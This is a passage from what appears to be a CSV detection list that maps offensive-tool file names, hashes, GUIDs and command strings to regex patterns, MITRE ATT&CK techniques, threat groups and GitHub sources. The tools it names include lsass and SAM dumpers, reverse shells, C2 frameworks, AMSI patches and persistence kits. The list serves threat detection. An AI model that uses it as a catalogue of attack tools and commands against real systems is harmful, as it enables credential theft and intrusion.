T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*DumpSAM.ps1*",".{0,1000}DumpSAM\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*DumpShellcode.*",".{0,1000}DumpShellcode\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*DumpShellcode.exe*",".{0,1000}DumpShellcode\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","128","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*DumpShellcode\*",".{0,1000}DumpShellcode\\.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*DumpSMSAPassword*",".{0,1000}DumpSMSAPassword.{0,1000}","offensive_tool_keyword","BloodHound","an adversary with local admin access to an AD-joined computer can dump the cleartext password from LSA secrets of any sMSAs installed on this 
computer","T1003.001 - T1078 - T1558.002","TA0006 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/BloodHoundAD/BloodHound","1","1","AD Enumeration","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*dumpVaultCredentials.py*",".{0,1000}dumpVaultCredentials\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*dumpXor.exe *",".{0,1000}dumpXor\.exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","10","10","531","75","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*Dynamically convert a native PE to PIC shellcode*",".{0,1000}Dynamically\sconvert\sa\snative\sPE\sto\sPIC\sshellcode.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*dynasty_rce/rce.php*",".{0,1000}dynasty_rce\/rce\.php.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*DynastyPersist-main.zip*",".{0,1000}DynastyPersist\-main\.zip.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - 
T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*Dyn-NetClone|x64*",".{0,1000}Dyn\-NetClone\|x64.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*Dyn-PyClone|Win32*",".{0,1000}Dyn\-PyClone\|Win32.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*-e --enumerate google*github*k8s --github-only-org --k8s-get-secret-values --gcp-get-secret-values*",".{0,1000}\-e\s\-\-enumerate\sgoogle.{0,1000}github.{0,1000}k8s\s\-\-github\-only\-org\s\-\-k8s\-get\-secret\-values\s\-\-gcp\-get\-secret\-values.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. 
Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","0","N/A","N/A","7","630","79","2024-02-01T15:17:31Z","2022-01-01T12:10:40Z" "*-e ZQBjAGgAbwAgAEcAbwBkACAAQgBsAGUAcwBzACAAWQBvAHUAIQA=*",".{0,1000}\-e\sZQBjAGgAbwAgAEcAbwBkACAAQgBsAGUAcwBzACAAWQBvAHUAIQA\=.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","587","88","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*e022c33f7f02b564f42f4ae68edded719b3e4cfdb3ea9ce9de2d07dc1c586321*",".{0,1000}e022c33f7f02b564f42f4ae68edded719b3e4cfdb3ea9ce9de2d07dc1c586321.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e066fd26097862651947220c02240ca24faceb5f4ca0d1279881d97f7cff2c17*",".{0,1000}e066fd26097862651947220c02240ca24faceb5f4ca0d1279881d97f7cff2c17.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e0745223bdd96223cc512234545e517028d410e462bfa265f4c09b8e3740a44a*",".{0,1000}e0745223bdd96223cc512234545e517028d410e462bfa265f4c09b8e3740a44a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e075c5a3c998e450c06b2e27ac2904ac2377b6d724577c5071437b68d6b3238b*",".{0,1000}e075c5a3c998e450c06b2e27ac2904ac2377b6d724577c5071437b68d6b3238b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*E08BAA9C-9D20-4C9A-8933-EC567F39F54C*",".{0,1000}E08BAA9C\-9D20\-4C9A\-8933\-EC567F39F54C.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*e094dc2a9ec5fe9800948a640f416fe610fdf155874e897d3cba6cc86f854083*",".{0,1000}e094dc2a9ec5fe9800948a640f416fe610fdf155874e897d3cba6cc86f854083.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*E09F4899-D8B3-4282-9E3A-B20EE9A3D463*",".{0,1000}E09F4899\-D8B3\-4282\-9E3A\-B20EE9A3D463.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - 
T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","0","N/A","8","2","139","28","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*e0b25ed05fbe4558e26b270038d41c1de91ecde35d03520a2f20aaab7eee37e3*",".{0,1000}e0b25ed05fbe4558e26b270038d41c1de91ecde35d03520a2f20aaab7eee37e3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e0bca03ae086a2ada8a29930036efe3ba12961a2ee71f2ec72cf9bd57096f604*",".{0,1000}e0bca03ae086a2ada8a29930036efe3ba12961a2ee71f2ec72cf9bd57096f604.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e0c20aa0ef6e4fd5cd5cabde2f89d64d4fe1c73d13cc1ed58e401bf5e0667754*",".{0,1000}e0c20aa0ef6e4fd5cd5cabde2f89d64d4fe1c73d13cc1ed58e401bf5e0667754.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e0cc8936e11dcf4e016ff32f5a81aa15f352cb71ec8a24b383dc263e56425018*",".{0,1000}e0cc8936e11dcf4e016ff32f5a81aa15f352cb71ec8a24b383dc263e56425018.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*e0dc49ab46ab388ae93213602843e135bae218d15f17fc74bdc56de38fe5d6cc*",".{0,1000}e0dc49ab46ab388ae93213602843e135bae218d15f17fc74bdc56de38fe5d6cc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e114380d61281bb9bffe5246d366342cecc6dfa22814b308fa08b075e0b0f35f*",".{0,1000}e114380d61281bb9bffe5246d366342cecc6dfa22814b308fa08b075e0b0f35f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*E11DC25D-E96D-495D-8968-1BA09C95B673*",".{0,1000}E11DC25D\-E96D\-495D\-8968\-1BA09C95B673.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","0","N/A","9","7","601","92","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*e12b5b70989233ee34a1984b959ac4e42a282148cc0f6f8a5434f2a1502e3fdd*",".{0,1000}e12b5b70989233ee34a1984b959ac4e42a282148cc0f6f8a5434f2a1502e3fdd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e1641d2918f41349e233feffd77b4f5088e4bc250d30a7be67693f3a09025088*",".{0,1000}e1641d2918f41349e233feffd77b4f5088e4bc250d30a7be67693f3a09025088.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack 
surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*E17B7339-C788-4DBE-B382-3AEDB024073D*",".{0,1000}E17B7339\-C788\-4DBE\-B382\-3AEDB024073D.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*e1a068365245f8a021fca5f8b40a2cc5aedd235015c39db6697b7d3ba05cd996*",".{0,1000}e1a068365245f8a021fca5f8b40a2cc5aedd235015c39db6697b7d3ba05cd996.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e1a5b167ec626fd934b6abac47d82987ba3313d505c1b3487072cca8ca9c4e65*",".{0,1000}e1a5b167ec626fd934b6abac47d82987ba3313d505c1b3487072cca8ca9c4e65.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*e1aa34410dd260529c0e32bb0fbc5263f3042bf47d01dc5ad424bb8cecc2b887*",".{0,1000}e1aa34410dd260529c0e32bb0fbc5263f3042bf47d01dc5ad424bb8cecc2b887.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e1b23e90752a40a4a54afc406b874655f6d279a26e140402ad3f69509e9da496*",".{0,1000}e1b23e90752a40a4a54afc406b874655f6d279a26e140402ad3f69509e9da496.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e1cd2b55-3b4f-41bd-a168-40db41e34349*",".{0,1000}e1cd2b55\-3b4f\-41bd\-a168\-40db41e34349.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*e1ed358b0e31199ca8ae3cc4307183d3131c27cef32c610bcc955a03527057bb*",".{0,1000}e1ed358b0e31199ca8ae3cc4307183d3131c27cef32c610bcc955a03527057bb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e21abc2c59ac704df355a42b7275021e48670c876d019f05f56bf5a9c4cff78c*",".{0,1000}e21abc2c59ac704df355a42b7275021e48670c876d019f05f56bf5a9c4cff78c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e230c0ac37691456fdf0363b1f81215c15a7a235ddc96f072c74c5ac40866c9e*",".{0,1000}e230c0ac37691456fdf0363b1f81215c15a7a235ddc96f072c74c5ac40866c9e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e237f1a9a8fc58940811f2ea1eb987242718290c588fb36c29741176700980bb*",".{0,1000}e237f1a9a8fc58940811f2ea1eb987242718290c588fb36c29741176700980bb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*e23efc384f4295bb8fbf5b0e6f2f3539f6ff45fbc2ef8ce2bb54aefebaa069e3*",".{0,1000}e23efc384f4295bb8fbf5b0e6f2f3539f6ff45fbc2ef8ce2bb54aefebaa069e3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e273485e4f1382b7848b6c263cf0ce9e37aa783e9e781630aaa50daffea5aeb2*",".{0,1000}e273485e4f1382b7848b6c263cf0ce9e37aa783e9e781630aaa50daffea5aeb2.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*e277468009b97989146089c83231fa03247555b6cc2979b68d549a0d0e8ea0e1*",".{0,1000}e277468009b97989146089c83231fa03247555b6cc2979b68d549a0d0e8ea0e1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
